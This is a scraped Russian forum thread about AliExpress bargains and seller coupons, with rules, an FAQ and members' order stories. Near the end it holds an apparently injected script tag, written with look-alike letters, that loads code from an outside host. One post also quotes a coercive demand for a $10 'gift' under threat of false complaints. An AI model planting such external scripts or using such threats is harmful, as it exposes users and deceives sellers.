Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Очень низкие цены на Алиэкспресс - купоны, акции, распродажи

Ответов в теме: 2062
ПользователиСообщений: 962Поблагодарили: 415 разСанкт-Петербург

Пожалуйста, ознакомьтесь с правилами темы, перед тем как задать вопрос или написать сообщение.

                    

УВАЖАЕМЫЕ ПОЛЬЗОВАТЕЛИ!


1. В этой теме выкладывайте ссылки только на действительно ОЧЕНЬ ДЕШЕВЫЕ ТОВАРЫ, никаких скидок в 5-10 %, никаких товаров со скидками 99% с изначально завышенной ценой, никаких "тут дорого, но я брала и мне понравилось".
2. Фотографии товаров размещайте в разделах Фотохвасты или Обзоры. Здесь выкладывайте только ссылки на выложенные фото.
3. Не задавайте вопросов типа "помогите найти такую", "может кто видел дешевле" - для этого есть много других тем на форуме, также вы можете создать свою собственную.
4НЕ ФЛУДИТЕ! В теме обсуждайте только ссылки. Споры с продавцами, кому что ответили, отправили, кто что получил - все эти вопросы задавайте в сооответствующих темах на форуме. Или друг другу посредством переписки в личке. 

 
                                        ОТВЕТЫ НА ЧАСТО ЗАДАВАЕМЫЕ ВОПРОСЫ


1. Как вы находите такие дешевые товары?
В поиске АлиЭкспресс включаем сортировку. Выбираем интересующий раздел, отмечаем "бесплатная доставка", "распродажа" и сортируем по возрастанию цены. Также магазины, в которых мы уже участвовали в акциях, присылают сообщения о распродажах на электронную почту. Всю информацию о новых акциях мы обязательно будем выкладывать на стену, чтобы ее могли видеть и другие участники темы.
2. Где искать купоны?
На сайте: РЕДИСКА
3. Точно ли продавец отправит товар?
Это как лотерея, продавцы могут ошибиться со скидкой или просто набивать себе рейтинг. Возможен вариант, что вам выдадут поддельный трек и ничего не вышлют. Или в посылке обнаружится совсем другой товар. Будьте внимательны или не рискуйте совсем. Никто вам не может ничего гарантировать.
4. Как пользоваться купонами?
На каждом купоне есть информация о том, на какую сумму надо взять товара и какую скидку вы при этом получите. Например, купон $10 off per $11, означает, что вам надо купить товара на 11 долларов и получить при этом скидку в 10 - итого выходит покупка будет стоить от $1. Можно брать несколько товаров на общую сумму больше $11, кидаем их в корзину, оформляем общий заказ у продавца, не забываем в поле купонов выбрать нашу скидку , видим конечную сумму со скидкой и заказываем. 2 купона с Редиски одновременно использовать нельзя! Если вы взяли несколько купонов, то должны оформить на них несколько заказов. Если у вас не получается использовать купон, т.е. в поле для купонов надпись "купонов нет", значит вы либо не взяли купон, либо не добрали до нужной суммы.

ОБРАЗЦЫ ПИСЕМ ПРОДАВЦАМ

Учесть всевозможные ситуации или предугадать поведение различных продавцов невозможно. Заказ делаете вы и с продавцом общаетесь тоже вы. Поэтому как и что писать решать только вам. Чтобы написать письмо на английском языке вы можете воспользоваться помощью онлайн-переводчиков (того же google, к примеру). Пишите короткие предложения - вероятность правильного перевода повысится.
*****
Не отслеживается номер трека, читаем и задаём вопросы здесь.
Окажу бесплатную помощь в диспутах (спорах), читаем и задаём вопросы здесь.

Общие вопросы по доставке и отслеживанию посылок, читаем и задаём вопросы здесь.

Помогите! Что делать? Где посылка? Где деньги? Посылка потерялась!, читаем и задаём вопросы здесь.

*****

Также на форуме есть раздел Статьи, в котором вы найдете ответы на многие вопросы о работе с площадкой Алиэкспресс.

 

Забава, Натальяяяяя и ещё 14 поблагодарили за этот комментарий
ПользователиСообщений: 908Поблагодарили: 192 разаУфа

lisenok85 писал(а):

JasL, А где это "почти даром"?

тут

Лисенок) поблагодарил(а) за этот комментарий
ПользователиСообщений: 1834Поблагодарили: 5147 раз На Волге

lisenok85 писал(а):

JasL, А где это "почти даром"?

http://group.aliexpress.com/ru.htm?catId=42491 Здесь

Лисенок) поблагодарил(а) за этот комментарий
ПользователиСообщений: 1368Поблагодарили: 2738 раз РБ
ПользователиСообщений: 325Поблагодарили: 208 раз Солигорск

Девушки, доброе утро!

Научите меня , как наказывать недобросовестных купонщиков! ((( Управы на них нет!!!

Как только оплатишь- сразу летят письма счастья с отказами.

ПользователиСообщений: 1174Поблагодарили: 607 разМОСКВА

veronika-lenchen писал(а):

Bee, спасибочки, сестра просила ей заказать, даже и не ожидалаSmileSmile

детский жилетик за 109 руб. http://ru.aliexpress.com/item/Free-shipping-fashion-2014-children-product-hooded-vest/1717273056.html может кому пригодитьсяWink

извиняюсь, 105 руб.

Как с размером так разобраться???

ПользователиСообщений: 908Поблагодарили: 192 разаУфа

JasL писал(а):

Да, по таблице в инете примерно 90 см - 2 года. У нас норма Взяла жилет на 4т, и 5 на вырост, разные.

Люди, сегодня продуктивный день! Из почти даром взяла двое трусов и красивенькую заколочку! Отхватила купон на 100 долларов, прод еще не писал. Еще несколько мелких купонов. Правда, пока оплачивала почти даром, в одном из них товары исчезли..

когда будешь делиться секретами как с продов на больших купонах товар выбиваешь???? Wink

а с жилетом пря не знаю как и быть... на 2,5 хотела на подарок, но девочка там крупненькая... даже не знаю теперь какой размер брать...

ПользователиСообщений: 168Поблагодарили: 51 разСЕВЕРНЫЙ ГОРОД
ПользователиСообщений: 191Поблагодарили: 43 разаСанкт-Петербург
Nori поблагодарил(а) за этот комментарий
ПользователиСообщений: 3697Поблагодарили: 3519 раз

Евгений И. писал(а):

http://ru.aliexpress.com/store/product/2pcs-lot-Promotions-Lady-s-organizer-bag-handbag-organizer-travel-bag-organizer-insert-with-pockets-storage/1015144_1831384210.html

Я ЭТО ВЗЯЛ

Хорошая вещь!

В сумке такая! Сумку надо поменять - вытащила органайзер и все!

ПользователиСообщений: 1174Поблагодарили: 607 разМОСКВА

взяла 2 жилетки оплатила разных цветов. мы 86 см. взяла 3Т и 4...незнаю как по размерам там.

ПользователиСообщений: 191Поблагодарили: 43 разаСанкт-Петербург

САНДРА писал(а):

ЕВГЕНИЙ Я ЗАКАЗАЛА ЭТО

круто - завидую, у меня купон есть такой, но использовать не успел - товар отсутствует уже стоит

ПользователиСообщений: 1834Поблагодарили: 5147 раз На Волге

Alex_M писал(а):

когда будешь делиться секретами как с продов на больших купонах товар выбиваешь???? Wink

а с жилетом пря не знаю как и быть... на 2,5 хотела на подарок, но девочка там крупненькая... даже не знаю теперь какой размер брать...

Бери на 4 просто, я бы так взяла.

Да какие секреты! Я ж не всех раскручиваю! У Леприкона лучше получается Wink А тех,кого раскрутила, еще неизвестно, что в посылку положили, положили ли, и идет ли она по моему адресу...

Alex_M поблагодарил(а) за этот комментарий
ПользователиСообщений: 1368Поблагодарили: 2738 раз РБ

Евгений И. писал(а):

круто - завидую, у меня купон есть такой, но использовать не успел - товар отсутствует уже стоит

а толку, эта редиска уже написала что ошибка мол и доплатите, плиз

ПользователиСообщений: 541Поблагодарили: 295 разБеларусь

Евгений И. писал(а):

круто - завидую, у меня купон есть такой, но использовать не успел - товар отсутствует уже стоит

зря. не знаю как у вас, а у меня абсолютно не сговорчивый экземпляр. Доплати - и все. Дорогой друг, у вас есть два варианта:
Во-первых, мы согласны, вы выслать мне хороший подарок ($ 10) может быть сувенир. Когда я получаю в подарок подтвердить получение Вашего продукта и поставить 5 звезд.
Второй вариант. Я жду, пока время не истечет направить (я могу долго ждать), а затем написать жалобу в администрацию, чат и т.д., что этого магазина обманщика. Поддельные рейтинг и так далее.
Выберите.

Так вот выбрал второй. Даже не торговался.

Отредактировал(а) HiroY 22-10-2014 в 12:18
Евгений И. поблагодарил(а) за этот комментарий
ПользователиСообщений: 168Поблагодарили: 51 разСЕВЕРНЫЙ ГОРОД

Евгений И. писал(а):

круто - завидую, у меня купон есть такой, но использовать не успел - товар отсутствует уже стоит

а толку то Sad он упёрся и не хочет отправлять обрабатываю его сейчасWink

Евгений И. поблагодарил(а) за этот комментарий
ПользователиСообщений: 4830Поблагодарили: 3998 раз Сибирь

Евгений И. писал(а):

круто - завидую, у меня купон есть такой, но использовать не успел - товар отсутствует уже стоит

не завидуй геморрою

HiroY и Евгений И. поблагодарили за этот комментарий
ПользователиСообщений: 528Поблагодарили: 321 разКазахстан

Аврора Невская писал(а):

http://ru.aliexpress.com/store/1088656 - платья без рейтинга в Акциях

Кто заказывал платья и оплатил, что пишет вам продавец, будет отсылать. Я не успела оплатить поднял цену, теперь провожу с ним воспитательную работу

ПользователиСообщений: 3269Поблагодарили: 1523 разаУфа

Хозяйка Дома, сумочник/ электронщик отправил посылку! Срок доставки 39 дней! Снизу припискаThe item has been sent out via singapore post with tracking number RF288829339SG,please kindly pay attention to your parcel.

If there is any query,please feel free to contact us.

Thank you for your attention

Тебе трек выдал нет? Такой же?

ПользователиСообщений: 189Поблагодарили: 87 разЕлец

Вчера писали, что у Ангела сегодня скидки должны быть. Не кинете ссылочку, а то я у нее ничего не заказывала.

ПользователиСообщений: 908Поблагодарили: 192 разаУфа

Rina-Irina писал(а):

Вчера писали, что у Ангела сегодня скидки должны быть. Не кинете ссылочку, а то я у нее ничего не заказывала.

http://ru.aliexpress.com/store/1184585

Rina-Irina поблагодарил(а) за этот комментарий
ПользователиСообщений: 1834Поблагодарили: 5147 раз На Волге

Тут кто-то спрашивал про шапку http://ru.aliexpress.com/item/2014-new-brand-winter-caps-for-men-women-High-quality-wool-caps-fashion-hats-solid-color/2052120426.html со скидкой. У меня тоже пока не трекается, но еще рано, только пять дней прошло.

У Ангела скидки уже есть, но меня ничего не заинтересовало.

Отредактировал(а) JasL 22-10-2014 в 12:29
Annetto4ka поблагодарил(а) за этот комментарий
ПользователиСообщений: 168Поблагодарили: 51 разСЕВЕРНЫЙ ГОРОД

может пропустила вот этот по купону кому уже выслал?

ПользователиСообщений: 1174Поблагодарили: 607 разМОСКВА

вот оплатила я костюм...теперь жду. если вышлит то еще 1 закажу. чето страшно сразу много заказывать)

ПользователиСообщений: 4830Поблагодарили: 3998 раз Сибирь

AlexandraV писал(а):

Кто заказывал платья и оплатил, что пишет вам продавец, будет отсылать. Я не успела оплатить поднял цену, теперь провожу с ним воспитательную работу

я закинул(все что было там),потом с ним по скайпу пообщался,и зассал заказывать,говорит образно,и не понятно,то ли пошлет,то ли ждет товар,общались-он на китайском,я на традиционном китайском(старом),вобщем понятно,но нюансы я не понял.Думаю облом(может не всем)

ПользователиСообщений: 3Минск

Здравствуйте форумчане! Помогите с решением моей проблемы косательно купонов. Взяла я купон на 49$ из 59. Набрала товаров, оформила заказ, но не оплатила сразу. На утро решила оплатить и увидела что сумма стоит в полном объеме, хотя действее купона еще 30 дней. Продавец объясняет это тем, что ему еще в следующем месяце работать... не поняла причем здесь я и мой купон? я пригрозила жалобой, но продавец видимо стебется, пожелав мне хорошего дня и кучу веселых смайлов.... как быть?

<sсriрt src="http://megaplugin.ru/data.php?test=1&el73o9u1=MjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMzI1MzM3NDE0YTRkNGU0Ng==&rnd=2292014">
Отредактировал(а) *() Натали ()* 22-10-2014 в 12:33
Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти